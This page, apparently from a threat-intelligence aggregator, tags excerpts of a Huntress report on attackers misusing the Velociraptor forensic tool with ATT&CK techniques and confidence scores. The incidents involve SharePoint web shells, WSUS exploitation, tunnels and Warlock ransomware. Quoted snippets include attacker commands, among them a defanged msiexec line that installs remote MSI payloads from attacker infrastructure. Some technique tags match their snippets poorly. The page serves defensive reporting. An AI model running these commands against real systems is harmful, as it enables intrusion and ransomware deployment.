TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Velociraptor Misuse, Pt. II: The Eye of the Storm

2025-12-03

ATT&CK techniques detected

24 predictions
T1505.003 Web Shell
99%
“…_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 /_layouts/signout.aspx 200 0 0 455 The ToolShell chain details how once authentication is bypassed, attackers chain a second vulnerability for remote code execution (CVE-…”
T1486 Data Encrypted for Impact
94%
“…a tunnel to an attacker-controlled C2. Figure 10: Excerpt from the Warlock ransomware note. The hostname used by the threat actor in this incident (DESKTOP-C1N9M) is the same workstation as one identified in August in a Singapore government security advisory. This advisory …”
T1059.001 PowerShell
92%
“…look at the Windows event logs shows an interesting trail of faux pas as the threat actor attempted to install a Cloudflare tunnel (initially unsuccessfully) and run the OpenSSH server – despite the application appearing to not be installed. Threat Actor Fumbles. The threat acto…”
T1190 Exploit Public-Facing Application
92%
“…- [redacted]443" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iis… -h "C:\inetpub\temp\apppools\SharePoint - [redacted]443\SharePoint - [redacted]443.config" -w "" -m 0 These detections indicate that the installations likely occurred via a …”
T1190 Exploit Public-Facing Application
87%
“…vectors - from exploitation via WSUS to web shell compromise on SharePoint - however, they all involved the Velociraptor tool, and there were several notable similarities in the post-exploitation activities. For instance, the MSI files across two incidents came from the same do…”
T1190 Exploit Public-Facing Application
81%
“…15, the Huntress SOC identified malicious activity originating directly from a managed service provider’s own network. An important note is that Huntress had sent an earlier incident report in July to the partner regarding this same SharePoint server. At that time, we observed …”
T1486 Data Encrypted for Impact
78%
“…, as seen via the binary path from EDR telemetry: "C:\Program Files\TightVNC\tvnserver.exe" -service. The attacker also installed a service called Security State Check (securitycheck.exe). This file’s hash is flagged as malicious on VirusTotal by a considerable n…”
T1569.002 Service Execution
76%
“…raptor. These installations were the result of the following commands: msiexec /q /i https[:]//royal-boat-bf05.qgtxtebl.workers[.]dev/ssh.msi msiexec /q /i https[:]//royal-boat-bf05.qgtxtebl.workers[.]dev/v3.msi A timeline created from Windows event log…”
T1195.002 Compromise Software Supply Chain
74%
“…saw the same Cloudflare tunnel token account tag, and the same download source for installed MSI files, being used across different incidents. - We also saw some techniques used across these three incidents that have been previously documented for attacks involving Velociraptor, …”
T1505.003 Web Shell
74%
“…15, the Huntress SOC identified malicious activity originating directly from a managed service provider’s own network. An important note is that Huntress had sent an earlier incident report in July to the partner regarding this same SharePoint server. At that time, we observed …”
T1219 Remote Access Tools
66%
“Velociraptor Misuse, Pt. II: The Eye of the Storm. Acknowledgements: Special thanks to Ben Folland, Anna Pham, Michael Tigges, and Anton Ovrutsky for contributing to this investigation and writeup. We recently outlined an incident on November 12 where threat actors exploited a v…”
T1543.003 Windows Service
65%
“…commands on the host, which they promptly used to run the command illustrated in Figure 5. Figure 5: Web shell running msiexec to install Velociraptor. For clarity, the observed command appears as follows: msiexec /q /i https[:]//royal-boat-bf05.qgtxtebl.workers[.…”
T1219 Remote Access Tools
61%
“…-terms service install > C:\ProgramData\Microsoft\AppV\i1.log type C:\ProgramData\Microsoft\AppV\i1.log Here, we see the attacker was downloading Visual Studio Code (code.exe) with the intent of establishing a remote tunnel. Figure 8: VS Code logs for tun…”
T1190 Exploit Public-Facing Application
48%
“Velociraptor Misuse, Pt. II: The Eye of the Storm. Acknowledgements: Special thanks to Ben Folland, Anna Pham, Michael Tigges, and Anton Ovrutsky for contributing to this investigation and writeup. We recently outlined an incident on November 12 where threat actors exploited a v…”
T1071.001 Web Protocols
48%
“Velociraptor Misuse, Pt. II: The Eye of the Storm. Acknowledgements: Special thanks to Ben Folland, Anna Pham, Michael Tigges, and Anton Ovrutsky for contributing to this investigation and writeup. We recently outlined an incident on November 12 where threat actors exploited a v…”
T1059.001 PowerShell
48%
“…on startup as the SYSTEM user. This is the primary goal for a threat actor post initial access – and in this case they achieved it in one step. With the Velociraptor foothold established, the adversary moved to set up a secondary C2 channel for added resilience, which was connect…”
T1505.004 IIS Components
38%
“…-terms service install > C:\ProgramData\Microsoft\AppV\i1.log type C:\ProgramData\Microsoft\AppV\i1.log Here, we see the attacker was downloading Visual Studio Code (code.exe) with the intent of establishing a remote tunnel. Figure 8: VS Code logs for tun…”
T1486 Data Encrypted for Impact
37%
“…leave the door open for months. Incident 3 - Warlock Ransomware. In early November, Huntress was installed by an organization after it had been hit by a Warlock ransomware attack. Because the agent was installed mid-compromise, our visibility was somewhat limited. However, the i…”
T1572 Protocol Tunneling
37%
“…of the relevant malicious requests from the SharePoint server’s IIS logs for this incident below: After using the POST requests to install the MSI files, the threat actor then logged into the endpoint via RDP, using an account named adminbak2, then installed a Cloudflare tunnel, …”
T1195.002 Compromise Software Supply Chain
37%
“…-terms service install > C:\ProgramData\Microsoft\AppV\i1.log type C:\ProgramData\Microsoft\AppV\i1.log Here, we see the attacker was downloading Visual Studio Code (code.exe) with the intent of establishing a remote tunnel. Figure 8: VS Code logs for tun…”
T1080 Taint Shared Content
37%
“…a tunnel to an attacker-controlled C2. Figure 10: Excerpt from the Warlock ransomware note. The hostname used by the threat actor in this incident (DESKTOP-C1N9M) is the same workstation as one identified in August in a Singapore government security advisory. This advisory …”
T1566.004 Spearphishing Voice
34%
“…-terms service install > C:\ProgramData\Microsoft\AppV\i1.log type C:\ProgramData\Microsoft\AppV\i1.log Here, we see the attacker was downloading Visual Studio Code (code.exe) with the intent of establishing a remote tunnel. Figure 8: VS Code logs for tun…”
T1569.002 Service Execution
32%
“…, as seen via the binary path from EDR telemetry: "C:\Program Files\TightVNC\tvnserver.exe" -service. The attacker also installed a service called Security State Check (securitycheck.exe). This file’s hash is flagged as malicious on VirusTotal by a considerable n…”
T1543.003 Windows Service
30%
“…, as seen via the binary path from EDR telemetry: "C:\Program Files\TightVNC\tvnserver.exe" -service. The attacker also installed a service called Security State Check (securitycheck.exe). This file’s hash is flagged as malicious on VirusTotal by a considerable n…”

Summary

Huntress reports an uptick in threat actors abusing the Velociraptor open-source DFIR tool, linked to incidents involving WSUS exploitation, VS Code tunnels, and more.